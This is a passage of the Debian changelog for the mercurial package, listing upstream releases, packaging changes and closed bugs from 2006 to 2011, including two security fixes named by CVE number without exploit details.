This is probably a bug in gcc-4.6 (gcc 4.5 works fine) but until it's solved, at least mercurial works again in armel (Closes: #636396) -- Javi Merino Thu, 03 Nov 2011 23:00:43 +0000 mercurial (2.0-1) unstable; urgency=low * New upstream release 2.0 * Don't include empty directories in the package -- Javi Merino Tue, 01 Nov 2011 22:40:40 +0000 mercurial (1.9.999+2.0rc1-1) experimental; urgency=low * Upstream 2.0 Release Candidate 1 * Cover more uses of "defaults to sensible-editor" in the documentation and support ru and ro translations. -- Javi Merino Sun, 30 Oct 2011 13:20:38 +0000 mercurial (1.9.3-1) unstable; urgency=low * New upstream release 1.9.3. -- Javi Merino Tue, 11 Oct 2011 22:31:33 +0100 mercurial (1.9.2-1) unstable; urgency=low * New upstream release 1.9.2. * Remove old code that removed cruft from site-packages -- Javi Merino Mon, 12 Sep 2011 20:55:12 +0100 mercurial (1.9.1-2) unstable; urgency=low * Update breaks to include all the packages that mercurial-1.9.1-1 broke because of the uncoordinated transition to dh_python2.
-- Javi Merino Wed, 10 Aug 2011 21:37:37 +0100 mercurial (1.9.1-1) unstable; urgency=low * Convert to dh_python2 * New upstream release 1.9.1 fixes "cannot import mercurial.httpclient with Python 2.7: 'module' object has no attribute 'PROTOCOL_SSLv2'" (Closes: #635496) -- Javi Merino Wed, 03 Aug 2011 08:00:03 +0100 mercurial (1.9-1) unstable; urgency=low * New upstream release 1.9 (Closes: #632250) * Strip trailing .0 from Debian Policy * Remove template warnings from debian/watch to remove a lintian warning -- Javi Merino Fri, 22 Jul 2011 19:44:26 +0200 mercurial (1.8.3-1) unstable; urgency=low [ Javi Merino ] * New upstream release 1.8.3 * Upgrade Debian Policy to 3.9.2.0 [ Jonathan Nieder ] * Make mercurial-common's Recommends field binNMU-safe (Closes: #626132) -- Javi Merino Tue, 10 May 2011 20:37:27 +0100 mercurial (1.8.1-3) unstable; urgency=low * Team Upload * deb_specific__disable_libdir_replacement.patch: Disable @LIBDIR@ replacement in the hg script, by setup.py (Closes: #620087, LP: #745250) -- Stefano Rivera Thu, 31 Mar 2011 00:06:02 +0200 mercurial (1.8.1-2) unstable; urgency=low [ Vincent Danjean ] * Set /etc/ssl/certs/ca-certificates.crt as default valid root certificates and add a recommends to the ca-certificates package (Closes: #619821) [ Javi Merino ] * Mercurial 1.8 breaks hg-git, add that info to debian/control (Closes: #619930) -- Javi Merino Mon, 28 Mar 2011 21:51:40 +0100 mercurial (1.8.1-1) unstable; urgency=low * New upstream release 1.8.1 backs out a behavior change for so-called 'fast-forward' merges on named branches. -- Javi Merino Sat, 12 Mar 2011 19:01:16 +0000 mercurial (1.8-1) unstable; urgency=low * New upstream release 1.8. 
Many new features and bugfixes, among them: - hgk: realize it is hgk and not gitk (Closes: #613339) -- Javi Merino Sun, 06 Mar 2011 16:01:58 +0000 mercurial (1.7.5-1) unstable; urgency=low * New upstream release 1.7.5 * Delete patch for_upstream__typo_in_manpage.patch which is now included upstream * Add patch for_upstream__add_backquote_fname.patch , proposed upstream (Closes: #611419) * Add patch from_upstream__fix_611420.patch which will be part of the next mercurial release (Closes: #611420) -- Javi Merino Sat, 05 Feb 2011 21:05:19 +0000 mercurial (1.7.3-1) experimental; urgency=low * New upstream release 1.7.3 * Add patch for_upstream__typo_in_manpage -- Javi Merino Tue, 25 Jan 2011 22:22:56 +0000 mercurial (1.7.2-1) experimental; urgency=low * New upstream release 1.7.2 (Closes: #606678) * Fix typo in NEWS (Closes: #605541) * Delete deb_specific__python-module-not-script.patch and deb_specific__mergetools * Update dh compatibility to 8 -- Javi Merino Mon, 13 Dec 2010 21:34:15 +0000 mercurial (1.6.4-1) unstable; urgency=low * New upstream release 1.6.4 (Closes: #598850) * Verify ssl validity in https connections (Closes: #598841) -- Javi Merino Mon, 04 Oct 2010 07:37:33 -0500 mercurial (1.6.3-1) experimental; urgency=low * New upstream release 1.6.3 * Deleted patch from_upstream__issue2255fix-basicauth.diff which is now included upstream. -- Javi Merino Tue, 31 Aug 2010 10:12:42 +0200 mercurial (1.6.2-2) unstable; urgency=low * The patch that fixed #586907 was not being applied. Now it should work. (Closes: #586907) -- Javi Merino Thu, 26 Aug 2010 16:31:09 +0200 mercurial (1.6.2-1) unstable; urgency=low * New upstream release 1.6.2 * Dropped build-depend on quilt (Closes: #588671) * Added a patch from upstream that works around a bug in python 2.6.5 (Closes: #586907) * Updated Standards-Version to 3.9.1.0 (no change needed) * Deleted patch for_upstream__add_doc_url_in_example_files.patch which is now in upstream. 
-- Javi Merino Fri, 06 Aug 2010 10:43:06 +0200 mercurial (1.6-2) unstable; urgency=low * Mercurial 1.6 breaks old versions of hg-git (Closes: #588336) -- Javi Merino Wed, 07 Jul 2010 15:48:53 +0200 mercurial (1.6-1) unstable; urgency=low [ Javi Merino ] * New upstream release (1.6). Many bug fixes and improvements. Among them: - push: break infinite http recursion bug with Python 2.6.5 (issue2179 and issue2255) (Closes: #586907) - zeroconf: Don't use string exceptions (Closes: #585250) * Removed patch for_upstream__bashism_in_examples.patch since a fix for #581122 is included upstream. * Updated Standards-Version to 3.9 (no change needed) [ Vincent Danjean ] * debian/control: + Use Breaks instead of Conflicts + Use a fixed version in Replaces I put 1.4 but it has been a long time since nothing has been moved from mercurial to mercurial-common -- Vincent Danjean Sun, 04 Jul 2010 09:55:28 +0200 mercurial (1.5.4-2) unstable; urgency=low * Fix regression in python 2.6.5 (Closes: #586907) -- Javi Merino Thu, 24 Jun 2010 12:46:57 +0200 mercurial (1.5.4-1) unstable; urgency=low * New upstream release (1.5.3). Fixes: * fix Issue2181 (commit generates traceback on Nonetype) * various improvements to SVN conversion support * minor doc improvements * New upstream release (1.5.4) (Closes: #586322). 
Fixes: * dispatch: include Python version in traceback * push: update help * status: avoid performance regression when no .hgsub is present * clone: fix performance issue with hardlinks and Windows shares * hgweb: fix race in refreshing repo list (issue2188) * hgrc: clarify that hgrc keys can be overridden and sections can be split * eol: new extension for managing file newlines based on a version controlled configuration file * pager: fork and exec pager as parent process with /bin/sh -c * rebase: stress that only local changesets should be rebased * convert/svn: close gettags() log stream (issue2196) * record: check that we are not committing a merge before patch selection -- Javi Merino Wed, 16 Jun 2010 09:51:21 +0200 mercurial (1.5.2-1) unstable; urgency=low * New upstream release. Many minor fixes: + Core * clone: fix URL too long problem with many heads * commands: revised documentation of 'default' and 'default-push' * copies: properly visit file context ancestors on working file contexts * diffstat: use ui.plain() instead of ui.interactive() * dirstate: fix in memory dirstate entries for 1-second race * dispatch: don't mangle ImportError abort messages * filemerge: use working dir parent as ancestor for backward wdir merge * hgrc.5: describe form of config values and mention lists as well * hgweb: fix attribute error in error response (issue2060) * log: document the new xml style * merge: correctly compute the flag for noexec filesystems * patch: don't look for headers in diff lines * push: fix bug in warning message selection * revlog: fix lazyparser.__iter__() to return all revisions (issue2137) * static-http: allow clone -r (issue2164) * subrepo: fix repo root path handling in svn subrepo * subrepo: propagate and catch push failures * templates: document missing template variables * util: fix default termwidth() under Windows * util: use an explicit prefix for checkexec/checklink temporary files + Extensions * convert/cvs: skip bad tags * convert/git: 
check status when reading output stream * convert/subversion: fix default URL checker prototype * mq: rewrite strip docstrings * mq: use util.unlink instead of os.unlink and os.removedirs * schemes: fix // breakage with Python 2.6.5 (issue2111) * Fix "bashism in /bin/sh hgeditor script" (changing shebang line) (Closes: #581122) -- Vincent Danjean Tue, 11 May 2010 11:01:25 +0200 mercurial (1.5.1-2) unstable; urgency=low * Refresh debian patches * Install localization files in the right place (Closes: #577132) -- Vincent Danjean Sat, 10 Apr 2010 06:58:38 +0200 mercurial (1.5.1-1) unstable; urgency=low * New upstream release -- Vincent Danjean Fri, 02 Apr 2010 10:45:26 +0200 mercurial (1.5-1) unstable; urgency=low * New upstream release + Fix "Reserved revnos aren't." (Closes: #552423) + Fix "Exception in zeroconf shows up in unrelated commands" (Closes: #572963) + Fix "/usr/bin/hg: HG(1) missing --config option syntax" (Closes: #548413) + Fix "A -> B, C -> A rename breaks diff --git" (Closes: #560386) -- Vincent Danjean Fri, 12 Mar 2010 15:10:33 +0100 mercurial (1.4.3-1) unstable; urgency=low * New upstream release. (Closes: #569612) * Updated Standards-Version to 3.8.4 (no change needed) * Remove Gerardo Curiel from the maintainer field as asked by the MIA team (Closes: #553101) * Do not install mercurial.el. It is only useful with emacs21 that will not be in squeeze. (Closes: #557211) * Add a note in NEWS about the disappearance of the alias extension (Closes: #536533) -- Vincent Danjean Mon, 15 Feb 2010 18:08:57 +0100 mercurial (1.4.1-1) unstable; urgency=low * New upstream release -- Vincent Danjean Thu, 03 Dec 2009 22:03:06 +0100 mercurial (1.4-1) unstable; urgency=low [ Vernon Tang ] * New upstream release. - /usr/share/doc/mercurial-common/examples/hg-relink gone (replaced by the relink extension) * Updated Standards-Version to 3.8.3.
[ Vincent Danjean ] * adjust quilt dependency so that it works with backports (ie quilt >> 0.46-6 instead of quilt >= 0.46-7) -- Vincent Danjean Thu, 19 Nov 2009 22:02:54 +0100 mercurial (1.3.1-1) unstable; urgency=low * New Upstream Version (mostly bugfixes) -- Vincent Danjean Thu, 23 Jul 2009 22:49:32 +0200 mercurial (1.3-2) unstable; urgency=low * Do not hardcode the python interpreter in the hg script (ie use python and not pythonX.Y...) [thanks Vernon Tang] -- Vincent Danjean Thu, 09 Jul 2009 17:21:25 +0200 mercurial (1.3-1) unstable; urgency=low [ Vincent Danjean ] * [debian/control] add version to the quilt dependency. "dh --with quilt" is only supported since quilt 0.46-7 (thanks Faheem Mitha and Zed Pobre) (Closes: #529700, #534589). [ Luca Falavigna ] * Changes for Python 2.6 transition (Closes: #532190): - Pass --install-layout=deb option to setup.py install call. - Bump python-all-dev dependency to >= 2.5.4-1~. [ Vernon Tang ] * New upstream release. (closes: #536009) - Experimental support for sub-repositories - Fixed support for HTTPS through proxies (closes: #498711) - Experimental share extension - Updated translations and numerous small changes and bug fixes * Updated Standards-Version to 3.8.2. -- Vincent Danjean Wed, 08 Jul 2009 17:03:39 +0200 mercurial (1.2.1-3) unstable; urgency=low * Only install (or remove) files in packages we are building (Closes: #529803) Who knows how dh_install detect if we are building arch-dep and/or arch-indep packages ? -- Vincent Danjean Wed, 27 May 2009 01:46:40 +0200 mercurial (1.2.1-2) unstable; urgency=low * rebuild (forgot to upload arch-all in previous upload) -- Vincent Danjean Tue, 19 May 2009 11:01:15 +0200 mercurial (1.2.1-1) unstable; urgency=low [ Vernon Tang ] * New bugfix upstream release. 
(Closes: #525403) - fixed version number build from tarball - fix allow_read logic for hgweb - improve handling of damaged revlogs in verify - keep .orig files when resolving - clear resolve state properly when rebasing - improve --command handling with bisect - fix diff against bundles - improve fetch logic for inactive branches - fix diffstat with notify - fix 'synthetic file adds' in CVS conversion [ Vincent Danjean ] * Dump Standards-Version (no change needed) * Switch to dh7 instead of cdbs (last releases of cdbs was breaking the build system) (Closes: #522426, #527504) -- Vincent Danjean Mon, 18 May 2009 19:43:53 +0200 mercurial (1.2-1) unstable; urgency=low * New upstream release. * Fix FTBFS with python-support 0.90 by removing dependence on python-support internals. (closes: #516269) -- Vernon Tang Fri, 06 Mar 2009 17:37:45 +0800 mercurial (1.1.2+hg20090217-7787-b8d750daadde-1) experimental; urgency=low [ Vernon Tang ] * New snapshot for feature freeze before next major release. * debian/patches: - deb_specific__mergetools: remove RCS merge from merge tools - Added: - proposed_upstream__dont-install-i18n - Dropped: - convert-darc-doc.patch: dropping for now to avoid fuzzing translations - backport__zeroconf-doc - Refreshed: - deb_specific__install-templates-separately - deb_specific__mergetools * debian/control: - Add gettext to build dependencies for compiling translations - Remove RCS merge from Recommends - Change merge tool Recommends to Suggests, add xxdiff [ Vincent Danjean ] * swich to debhelper 7. Debhelper 5.0.37.2 is not enought: 6.0.7 at least is required for dh_lintian to be called. 
* Fix version to hg hash (instead of 'unknown') for this snapshot * Fix upstream version in changelog * Upload to experimental -- Vincent Danjean Wed, 18 Feb 2009 16:24:23 +0100 mercurial (1.1.2-2) unstable; urgency=low * debian/mercurial.postinst: symlink /usr/share/doc/mercurial if dpkg didn't do it when upgrading (closes: #512155) * debian/control: mercurial-common replaces all earlier versions of mercurial -- Vernon Tang Sun, 18 Jan 2009 10:39:58 +0800 mercurial (1.1.2-1) unstable; urgency=low [ Vernon Tang ] * New upstream release (closes: #499846) Also resolves the following Debian bugs: - mq corrupts repository on file rename (closes: #503997) - failing import breaks Python help (closes: #476885) - hg email doesn't use correct encoding (closes: #427854) - error when loading extensions twice (closes: #447088) - static-http does not work with old layout repositories (closes: #494889) - hgwebdir.cgi goes into endless loop when viewing moved files (closes: #506694) * Install hg-ssh (ssh login shell for an hg server) system-wide. * Don't enable extensions by default. (closes: #511872, #503865, #491109) * debian/control: - Moved dependencies to mercurial-common where appropriate - Removed Recommends: python-beaker (not a Mercurial dependency) - Removed 'convert' extension dependencies from Suggests: (convert depends on many of the other SCMs it can convert from) - Added python-openssl to Suggests for "hg serve" HTTPS support. * debian/hgext.rc: updated for 1.1.2. * debian/mercurial*, debian/rules: general cleanup. * debian/README.Debian: updated, proofread, and corrected. * debian/patches: - Added headers. 
- Added: - deb_specific__install-templates-separately (patch template search path to /usr/share instead of symlinking from the module directory) - backport__zeroconf-doc, proposed_upstream__correct-zeroconf-doc - deb_specific__mergetools - Renamed deb_specific__ElementTree_for_darcs.patch to deb_specific__optional-dependencies and updated to suggest Debian packages for more optional dependencies - Dropped: - proposed_upstream__extension_syntax.patch - deb_specific__FAQ_subst.patch - deb_specific__bash_completion_global_option_already_set.patch - backport__CVE-2008-2942-fix.patch - backport__svn1.5-fix.patch - Refreshed: - deb_specific__use_sensible-editor.patch - deb_specific__hgk.py.patch - convert-darc-doc.patch [ Sandro Tosi ] * debian/control - switch Vcs-Browser field to viewsvn [ Marco Rodrigues ] * debian/control: + Add ${misc:Depends} to Depends to remove lintian warning. [ Vincent Danjean ] * Document the fact that extensions are not enabled by default anymore in the NEWS file * big thanks to Vernon Tang for its work * upload the package -- Vincent Danjean Sat, 17 Jan 2009 17:33:46 +0100 mercurial (1.0.1-5.1) unstable; urgency=high * Non-maintainer upload by the Security Team. * Honor allowpull configuration setting from hgrc on a repository clone to prevent information disclosure (CVE-2008-4297; Closes: #500781). 
-- Nico Golde Fri, 03 Oct 2008 16:25:13 +0200 mercurial (1.0.1-5) unstable; urgency=low * Fix debian/copyright (GPL-2 only and not GPL-2+) (Closes: #493967) -- Vincent Danjean Tue, 26 Aug 2008 15:28:20 +0200 mercurial (1.0.1-4) unstable; urgency=low * fix subversion 1.5 compatibility (Closes: #492244) using upstream patch * fix bashism in postinst -- Vincent Danjean Thu, 31 Jul 2008 14:27:51 +0200 mercurial (1.0.1-3) unstable; urgency=low * debian/control: + update Standards-Version (no change needed) + add python-beaker as recommends (needed for "hg serve") (Closes: #486299) * fix wrong ucf registration (/etc/hgrc.d/ vs /etc/mercurial/hgrc.d/) (Closes: #487089). Thanks Max Bowsher for noticing. * add a mention of "legacy Darcs 1 format" in convert documentation (Closes: #485887) -- Vincent Danjean Tue, 08 Jul 2008 20:40:05 +0200 mercurial (1.0.1-2) unstable; urgency=high * Backport from upstream: fix CVE-2008-2942 Insufficient input validation (Closes: #488628) -- Vincent Danjean Tue, 01 Jul 2008 18:44:19 +0200 mercurial (1.0.1-1) unstable; urgency=low * New upstream release + Bugfix release * debian/watch: do not call uupdate -- Vincent Danjean Sat, 31 May 2008 19:26:16 +0200 mercurial (1.0-7) unstable; urgency=low * Lowering versioned dependency on ucf. Etch version of ucf is enough. #479485 was using a pre-etch version of ucf. -- Vincent Danjean Mon, 26 May 2008 09:25:45 +0200 mercurial (1.0-6) unstable; urgency=low * add versioned dependency on ucf due to the use of ucfr (Closes: #479485) * re-add rcs as first alternative of Recommends. Discussion about this can be found in #460943 and #479077 (Closes: #479077) -- Vincent Danjean Wed, 21 May 2008 10:04:32 +0200 mercurial (1.0-5) unstable; urgency=low * Add a note in the NEWS file about upstream change for merging conflicts.
(Closes: #481553, ) * install mergetools.hgrc system wide (Closes: #481089) * add suggest and documentation for convert extension dependencies (Closes: #477652) -- Vincent Danjean Tue, 20 May 2008 22:46:57 +0200 mercurial (1.0-4) unstable; urgency=low * fix build system so that "hg version" works * fix typos in doc (darcs instead of darc) * remove suggests: for foreign SCM. If someone needs them for the convert extension, they should be already installed (Closes: #476342) -- Vincent Danjean Wed, 16 Apr 2008 10:05:53 +0200 mercurial (1.0-3) unstable; urgency=low * really fix auto-enabling extensions at installation time + be less strict with spaces + reformat the hgext.rc file to be consistent -- Vincent Danjean Tue, 15 Apr 2008 10:32:38 +0200 mercurial (1.0-2) unstable; urgency=low * fix typo in mercurial postinst * remove Suggests to non existant mercurial-web * add lintian-override for non depends on "tk8.4 | wish" in mercurial-common (the Suggests: is in the mercurial package as for all other extensions' dependencies) * fix handling of automatic enabled extension in postinst (they must be disabled in the installed template) * add detection of inotify extension before enabling it (needed on etch that has a too old libc) -- Vincent Danjean Mon, 07 Apr 2008 09:06:04 +0200 mercurial (1.0-1) unstable; urgency=low * new upstream version Closes several Debian bugs: * "hg convert broken" (Closes: #472185) * "hgmerge: uses non-POSIX syntax `type' in /bin/sh script" (Closes: #447094) * "hgmerge: --help option gives a message that ends strangely" (Closes: #443428) * "mercurial: hg/editor interaction leaves a lot of temp files around" (Closes: #472943) * "mercurial: Mercurial merge with meld needs hint" (Closes: #466006) * "glog: tries to close closed fd" (Closes: #454326) * "mercurial: `hg diff` can break UTF-8 encoding" (Closes: #469326) * "Recording mtime after recording commit message leads to hidden (lost) changes" (Closes: #452385) General: * greatly improved merge 
tool configuration, see "hgrc.5.txt" for details * improved copy/rename handling in diffs, status, and merge * files in .hg inherit permissions from .hg/store * infer --repository when possible, so commands may be run from anywhere. * easy-installable * new "droplet" logo Commands: * archive: disable ".hg_archival.txt" file addition with "ui.archivemeta" * bisect: now built-in with greatly improved performance and usability * bundle: new --all option to bundle the whole repository more easily. * cat: apply decode filters with --decode * clone: can clone from a full-history bundle * commit: warn when creating a new head * debugancestor: index argument is now optional * diff: set the number of context line to show with -U/--unified * grep: display matched revisions commit date with --date * import: new --no-commit and --user options * incoming/outgoing: add --limit option * log: use -b/--only-branch to show revisions of a single branch * remove: improve handling for --after * revert: major speedup * serve: prefix the served path with --prefix (also in [web] section) * status: unknown files are skipped by --quiet * tag: allow multiple tags to be added or removed * tags: --verbose flags local tags * update: switch between named branches without -C Extensions: * churn: promoted to an official extension (previously in contrib) * color: new extension coloring "status" and "qseries" command outputs * convert: * allow synthetic history to be spliced in with --splicemap * support GNU Arch and Monotone sources * svn: allow shallow conversions of single branches with convert.svn.startrev option. * svn: make trunk/branches/tags layout detection more flexible by allowing either of them to be skipped. 
* svn: preliminary support as a conversion target * hgk: configuration file changed from .gitk to .hgk * highlight: new extension enabling syntax highlighting in hgweb file view (requires pygments) * inotify: new extension using Linux 2.6 inotify API for instant status checking * keyword: new extension for filewise RCS-keyword expansion in working directory * mq: new --currentdate, --date, --currentuser, and --user options * record: add "qrecord" command when used with mq Web interface: * improved WSGI integration and compatibility * follow symlinks in hgwebdir collections * show branches in most of gitweb templates * add line anchors to annotate, changeset, diff and file views * support web.baseurl in hgwebdir, overriding SCRIPT_NAME Hooks: * standard hook to reject text files with CRLF in win32text extension * redirect stdout to stderr for ssh and http servers [ Gerardo Curiel ] * Split package to fix lintian warnings: + mercurial - main package + mercurial-common - Arch-indep bits * Fix clean target * Dropped patches: patches/proposed_upstream__check_hgmerge_args.patch patches/proposed_upstream__type_is_not_posix.patch * patches/deb_specific__use_sensible-editor.patch: Rediff against mercurial 1.0 * hgmerge shell script is not provided anymore * contrib/favicon.ico is not provided anymore * Deleted obsolete link_hgit target from debian/rules * Added mergetools.hgrc to the examples directory * Added logo-droplets.svg to /usr/share/mercurial * Added new extensions to the hgext.rc file + hgext.color (not enabled by default) + hgext.highlight (not enabled by default) + hgext.inotify (enabled, Closes: #472583) + hgext.keyword (not enabled by default) * Removed extensions from the hgext.rc file + hgext.hbisect (now provided as a built-in command) * Added new suggested dependencies : + python-pygments (needed for hgext/highlight.py) + python-elementtree (for darcs conversion) [ Vincent Danjean ] * import mercurial in the Python Application Packaging Team project * 
debian/control: + add PAPT in the Uploaders field + add Vcs-* fields + add conflicts/replaces fields to ensure proper upgrade for mercurial-common * cleanup debian/ files + remove unneeded debian/*.{dirs} files * move examples/ in usr/share/doc/mercurial (in the mercurial-common package) * manage hgext.rc with ucf. Enabling some extensions only if their dependencies are present * put all usr/share/python-support/* in mercurial-common instead of mercurial. This trigger a lintian warning but this is an error (see #473428) [ Piotr Ożarowski ] * New recommended packages: + python-mysqldb (hgext/bugzilla.py) + python-openssl (hgweb/server.py) * New suggested packages: + python-flup (contrib/hgwebdir.fcgi, Closes: #466731) [ William Pitcock ] * patches/deb_specific__use_sensible-editor.patch: +Rediff against 1.0 branch. -- Vincent Danjean Mon, 07 Apr 2008 00:11:40 +0200 mercurial (0.9.5-3) unstable; urgency=low * [debian/control] + Recommends rcs first (and before kdiff3) as hgmerge use it in first (and does not use another program if it exists) (Closes: #460943) As an additionnal value, rcs has really fewer dependencies + Move Homepage: from description to source stanza + Suggest qct instead of commit-tool (better developed upstream) + Bump standard-version to 3.7.3 (no change needed) + Add python-elementtree to suggest (needed for hg convert with darcs repo) (Closes: 459353) Should be removed when debian will switch to python2.5 (as it is included in it) + move tk8.4 | wish from recommends to suggests as it is needed by an extension (hgk) and not by the core package * [debian/README] + document that extension dependencies are listed as Suggests: * [debian/patches/deb_specific__use_VISUAL_envvar.patch] Rewrite the patch using sensible-editor (Closes: 448376) and rename it to deb_specific__use_sensible-editor.patch * [debian/rule] + rewrite the fix for cdbs/dh_python so that we depend on the current python version (Closes: #456556) -- Vincent Danjean Mon, 21 Jan 2008 
20:57:27 +0100 mercurial (0.9.5-2) unstable; urgency=low * Apply patch to change 'hgext/' into 'hgext.' when loading an extension Current config files use the documented syntax (ie 'hgext.extname=') Users can use 'hgext/extname=' in their hgrc if they want to (Closes: #447088) -- Vincent Danjean Fri, 02 Nov 2007 11:59:03 +0100 mercurial (0.9.5-1) unstable; urgency=low * New upstream release Closes: #435636 (erroneous multiple heads after commit) Closes: #427808 (hgweb/hgwebdir do not work with flup (FastCGI)) Closes: #418780 (partial hgweb listings) Closes: #440175 (please include record extension) Closes: #447663 (0.9.5 available) Closes: #427851 (RSS feeds have wrong URL with https) New features: * Handle symlinks on systems without symlink support * hg archive supports symlinks * Display executable/symlink bit with "hg manifest -v" (see UpgradeNotes) * Improved hg verify diagostics * Faster revlog handling * Faster handling of large directories * Greatly improved handling of large files * Atom syndication support in hgweb * Improved test suite with parallel execution Fixes: * Fixes for some file copy and rename corner cases * Allow moving newly-added files before commit * Improve hg diff whitespace handling * Disallow fast-forward merge with an ancestor * Fix adding untracked files on directory renames * Fix hg archive %r format specifier * Fix re: and glob: patterns in .hgignore * Improve hg executable path resolution * Many options and hgrc parsing improvements * Better handling of VFAT filesystems on Linux * Fix tgz archival on Windows * Fix hg serve on Windows requiring pywin32 modules * Fix --profile under Windows New extensions: * alias - allow user-defined command aliases * children - show the children of the given or working dir revision * imerge - incremental interactive merging * interhg - modify changelog text as in InterWiki * record - darcs-style interactive change selection during commit New extension features: * convert * Now supports Subversion, 
Darcs and Mercurial as source SCMs * Use clone's behaviour for the default destination name * Force encoding to UTF-8 for converted repository * Support new-style .cvspass file format * Filter the files and directories to import * Remap paths to new locations during import * hgk * Fix hgk stopping because of untrusted repository warnings * Handle filenames with spaces * Improved documentation * mq * Autodetect --git patches on qrefresh * Improve README.Debian about Emacs Closes: #446972 (mercurial.el: autoload) Thanks to Trent W. Buck for its explainations added to the README.Debian * Apply several patches to hgmerge: - use /bin/bash for hgmerge: 'type' is not POSIX (Closes: #447094) - patch hgmerge to do minimum check of its arguments (Closes: #443428) - use $VISUAL and default to 'editor' instead of 'vi' (Closes: #447095, #448376) [mercurial/command.py modified too] * Correct wrong link to web docs in README.Debian (Closes: #425841) * [debian/control] Recommends: meld (used to hgmerge) (Closes: #316347) -- Vincent Danjean Mon, 29 Oct 2007 10:22:45 +0100 mercurial (0.9.4-1) unstable; urgency=low * New upstream release (Closes: #430714) + New features: * support for symlinks * improved tag handling * improved merge handling of file and directory renames * improved named branch usability * numerous improvements to commands * generic pre- and post-command hooks * improved Windows support * basic BeOS and OpenVMS support * numerous bug fixes + New extensions and contributions: * extensions can now be specified in .hg/hgrc * new convert extension with CVS support * new graphlog extension * improved patchbomb extension * example FastCGI script -- Vincent Danjean Wed, 27 Jun 2007 00:33:27 +0200 mercurial (0.9.3-2) unstable; urgency=low * [debian/rule, debian/control] remove workaround for symlink support in python-support and bump dependency of python-support (>= 0.4.3) * [debian/rule] use default python interpreter as 2.4 is the default now * [debian/mercurial.postinst] 
remove old /usr/lib/python*/site-packages/{mercurial,hgext} directories if needed (Closes: #382252) * forgot to closes: #382185 since 0.9.2 upstream release (hgrc manual does not say [smtp] host is optional any more) -- Vincent Danjean Wed, 3 Jan 2007 14:22:10 +0100 mercurial (0.9.3-1) unstable; urgency=low * New upstream release + Bug fixes: - fix a merge copy/rename corner case - fix spurious new heads message with push -r - fix hg export %n sequence numbers - fix shell quoting on Windows - fix charset encoding for hgwebdir and obfuscated addresses - fix missing generated files for distribution tarball - fix convert-repo tag updates and transcoding of committer - add instructions for redoing failed merges + Documentation fixes: - hg cat, manifest, and tag default to current parent revision. - CGI stub comments clarified - corrected synopses for many commands - improve doc building and distribution - convert-repo: update usage information + Extension fixes: - mq: fix strip on Windows - mq: fix some guards corner cases - gpg: make 'hg sign' default to current parent -- Vincent Danjean Tue, 19 Dec 2006 11:25:55 +0100 mercurial (0.9.2-3) unstable; urgency=low * remove debian/patches/submitted_upstream__restore_hgk.py.patch as it is now included in the release (and avoid to use a old hgk.py with a recent hg) (Closes: #403282) -- Vincent Danjean Sat, 16 Dec 2006 15:51:13 +0100 mercurial (0.9.2-2) unstable; urgency=low * [debian/rules] add support for python2.5 * [README.Debian] update list of default extensions -- Vincent Danjean Thu, 14 Dec 2006 15:26:10 +0100 mercurial (0.9.2-1) unstable; urgency=low * New upstream release + New features: - merge now follows renames and copies - new layout protects against case-insensitivity issues - new branch and branches commands for managing named branches - push command accepts -r for pushing specified heads or named branches - proper storage of changelog and other metadata in UTF-8 - log, annotate and grep '--follow' follow 
renames and copies - date parsing is improved and log, update, and revert accept --date ranges - additional command options for log, status, addremove - improved schema for hgweb URLs - bundle can now use '-r' and '--base' removing the need of an base repository - support for git-style extended patches with --git option - new debuginstall command to check for common installation issues + New contributions and extensions: - mq - support for quilt-style guards - can import existing changesets into mq ('qimport -r') or commit mq patches as regular changesets ('qdel -f') - edit the log message with 'qrefresh -e' - rename patches with 'qrename' - qheader to display the patch header of particular patches, and '--summary' for qseries, qapplied, qunapplied and qtop - combine patches with 'qfold' - qrefresh supports pattern options to import only a subset of the changes into a patch, to help split changes into multiple patches - patch names for applied patches act like local tags, and can be used in the revision arguments of any hg command - hgk - browse a subset of the history with '--limit' and revision range arguments - shows revision numbers as well as node hashes - churn: graph lines of code changed per user over a range of history - patchbomb: generate inline attachments with '-a' + Behavior changes: - hg cat defaults to the working directory revision rather than tip - hg manifest no longer shows internal file revision hashes by default - hg revert now requires the -a flag to revert all files + Developer notes: - new high-level API functions in the 'hg' module - new context API simplifies many operations - The changelog can now include arbitrary metadata in key: value form * [debian]: include the churn extension and enable it by default -- Vincent Danjean Thu, 14 Dec 2006 13:05:01 +0100 mercurial (0.9.1+20061210+8c24b6fd5866-1) experimental; urgency=low * New upstream release snapshot before 0.9.2 release * [debian/control] : update maintainer field : I'am DD now :-) 
-- Vincent Danjean Sun, 10 Dec 2006 22:40:30 +0100 mercurial (0.9.1-1) unstable; urgency=low * New upstream release Major changes between Mercurial 0.9 and 0.9.1: New features: - You can now configure your 'hgweb' server to let remote users 'push' changes over http. - You can now 'import' a patch in a mail message by saving the mail message, and importing it. This works for patches sent either inline or as attachments. - The 'diff' command now accepts '-rA:B' syntax as a synonym for '-r A -r B', and adds '-b' and '-B' options. New contributions and extensions: - The 'acl' extension lets you lock down parts of a repository against incoming changes - The 'extdiff' extension lets you run your favourite graphical change viewer - Comprehensive integration with the 'vim' editor - A restricted shell for 'ssh'-hosted repositories - An importer for 'darcs' repositories New hooks added: - 'preupdate' is run before an update or merge in the working directory. - 'update' is run after an update or merge in the working directory. Behaviour changes: - NOTE: Mercurial as installed by the Windows binary installer no longer performs automatic line-ending conversion for Unix/Linux compatibility. To re-enable this feature, edit your 'mercurial.ini' file after you upgrade. - The Windows binary installer now automatically adds 'hg' to your '%PATH%'. - The 'backout' command now runs an editor by default, to let you modify the commit message for a backed-out changeset. - An earlier problem with parsing of tags has been fixed. This makes tag parsing slower but more reliable. Memory usage and performance improvements: - The 'remove' command has been rewritten to be hundreds of times faster in large repositories. - It is now possible to 'clone' a repository very quickly over a LAN, if the server is configured to allow it. See the new 'server' section in the 'hgrc' documentation. Other changes of note: - Mercurial will now print help for an extension if you type 'hg help EXT_NAME'. 
